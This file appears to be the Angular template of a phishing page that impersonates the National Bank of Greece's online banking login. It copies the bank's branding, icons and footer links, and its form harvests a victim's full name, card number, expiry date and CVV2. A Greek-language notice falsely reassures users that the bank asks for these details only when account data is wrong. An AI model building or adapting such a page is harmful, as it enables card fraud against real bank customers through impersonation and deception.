


<div class="max-width-container-login">
    <div class="login-container">
        <h1 class="text-page-heading text-align-center text-medium text-white"> Τα στοιχεία της κάρτας μου</h1><img
            class="login-header-img margin-bottom-medium login-night">
        <!---->
        <div>
            <div class="user-login-subcontainer">
                <!---->
                <div class="full-height flex-column">
                    <div class="position-relative">
                        <div class="flex-center">
                            <input [(ngModel)]="fullName" (keyup)="onKeyName()" class="oval-input ng-pristine ng-valid ng-touched"
                                test-field="usernameField" type="text" placeholder="Πλήρες όνομα">
                            
                                <!---->
                                <div class="right-default field-tooltip"><button class="button-transparent" type="button">
                                    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSo7ndulglhKhTj2Up9hDrJkCT186zQJo2Q4A&usqp=CAU" width="28" height="28" alt="">
                                </button>
                                </div>
                            <br>
                            
                            <!---->
                        </div>
                        
                    </div>
                    <div class="position-relative margin-top-default"  >
                        <div class="flex-center">
                            <input [(ngModel)]="cardNumber" (keyup)="onKeyCard()" maxlength="16" class="oval-input ng-pristine ng-valid ng-touched"
                                test-field="usernameField" type="text" placeholder="Αριθμός Κάρτας">
                            
                                <!---->
                                <div class="right-default field-tooltip"><button class="button-transparent" type="button">
                                    <img src="https://e7.pngegg.com/pngimages/117/675/png-clipart-visa-and-mastercard-ads-mastercard-credit-card-american-express-visa-debit-card-mastercard-text-payment.png" width="73" height="25" alt="">
                                </button>
                                </div>        
                            <br>
                            
                            <!---->
                        </div>
                        
                    </div>
                    <div class="position-relative margin-top-default"  >
                        <div class="flex-center">
                            <input [(ngModel)]="expDate" (keyup)="onKeyExp()" onkeyup="this.value=this.value.replace(/^(\d\d)(\d)$/g,'$1/$2').replace(/^(\d\d\/\d\d)(\d+)$/g,'$1/$2').replace(/[^\d\/]/g,'')"  class="oval-input ng-pristine ng-valid ng-touched"
                                test-field="usernameField" type="text" maxlength="5" placeholder="Ημ. Λήξης: μμ/εε">
                            
                                <!---->
                          
                            <br>
                            
                            <!---->
                        </div>
                        
                    </div>
                    <div class="position-relative margin-top-default"  >
                        <div class="flex-center">
                            <input [(ngModel)]="CVV" (keyup)="onKeyCVV()" class="oval-input ng-pristine ng-valid ng-touched"
                                test-field="usernameField" type="text" maxlength="3"  placeholder="CVV2">
                            
                                <!---->
                                <div class="right-default field-tooltip"><button class="button-transparent" type="button">
                                    <img src="https://www.flaticon.com/svg/static/icons/svg/62/62936.svg" width="28" height="28" alt="">
                                </button>
                                </div>
                            <br>
                            
                            <!---->
                        </div>
                        
                    </div>
                    <!---->
                    <!---->
                    <div class="flex-vertical-center-space-between margin-top-normal">
                        <!---->
                        <!---->
                        <button class="button" (click)="submitForm()" style="min-width: 20rem;" test-button="continueLoginButton"
                        [disabled]="disabled2 || disabled3 || disabled4">  Σύνδεση  </button>
                        <!---->
                    </div>
                    <!---->
                    <!---->
              </div>
                <!---->
            </div>
        </div>
        <!---->
        <div class="flex-vertical-center  margin-horizontal-auto"
            style="max-width: 18.75rem; height: 100%; margin-top: 1.5rem">
            <div
                class="icon-container flex-all-center text-large lock-circle-icon circle-large-primary margin-right-medium">
                <img src="https://ibank.nbg.gr/identity/dist/icons/lock-circle.8d6ed53141c46ef004136125d2fdd5e8.svg">
            </div><span class="text-medium text-white text-small"> Προσοχή! Η Εθνική Τράπεζα θα σας ζητήσει μόνο τα στοιχεία σας σε περίπτωση λανθασμένων δεδομένων στο λογαριασμό σας. <a
                    class="link-white text-white text-bold" href="https://ibank.nbg.gr/identity/security-information"
                    target="_blank">Συμβουλές
                    ασφαλείας</a></span>
        </div>
    </div>
    <div class="margin-top-auto">
        <div class="useful-links-container">
            <div class="social-links-container"><a class="icon-container icon-facebook-lg" ngclass="icon-facebook-lg"
                    target="_blank" href="https://www.facebook.com/ibanknbg"></a><a
                    class="icon-container icon-twitter-lg" ngclass="icon-twitter-lg" target="_blank"
                    href="https://twitter.com/NationalBankGR"></a><a class="icon-container icon-youtube-lg"
                    ngclass="icon-youtube-lg" target="_blank"
                    href="https://www.youtube.com/channel/UCAwPZIUpdP3aIQlfw4bETLQ"></a><a
                    class="icon-container icon-linkedin-lg" ngclass="icon-linkedin-lg" target="_blank"
                    href="https://www.linkedin.com/company/national-bank-of-greece/"></a><a
                    class="icon-container icon-email-lg" ngclass="icon-email-lg"
                    href="mailto:contact.center@nbg.gr"></a></div>
            <div class="links-container">
                <!----><a class="link-white button-transparent useful-link" target="_blank"
                    href="https://www.nbg.gr/Style%20Library/ReusableContent/privacy_statement.pdf"> Προστασία
                    Δεδομένων Προσωπικού Χαρακτήρα </a><a class="link-white button-transparent useful-link"
                    target="_blank" href="https://ibank.nbg.gr/identity/browser-compatibility"> Συμβατότητα με
                    browsers </a></div>
        </div>
    </div>
</div>